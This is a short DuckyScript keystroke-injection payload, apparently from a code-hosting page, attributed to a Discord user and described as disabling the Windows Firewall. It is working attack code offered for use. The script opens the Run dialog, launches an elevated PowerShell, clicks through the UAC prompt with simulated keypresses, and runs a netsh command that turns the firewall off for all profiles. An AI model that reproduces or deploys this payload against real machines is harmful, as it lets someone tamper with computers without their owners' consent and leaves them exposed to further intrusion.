19 lines
364 B
Plaintext
19 lines
364 B
Plaintext
REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
|
|
REM Description: Disables the Windows-Firewall.
|
|
REM Version: 1.0
|
|
REM Category: Execution
|
|
DELAY 750
|
|
WINDOWS d
|
|
DELAY 850
|
|
WINDOWS r
|
|
DELAY 900
|
|
STRING powershell Start-Process powershell -Verb runAs
|
|
ENTER
|
|
DELAY 750
|
|
LEFTARROW
|
|
ENTER
|
|
DELAY 900
|
|
ALT y
|
|
DELAY 900
|
|
STRING netsh advfirewall set allprofiles state off; exit
|
|
ENTER |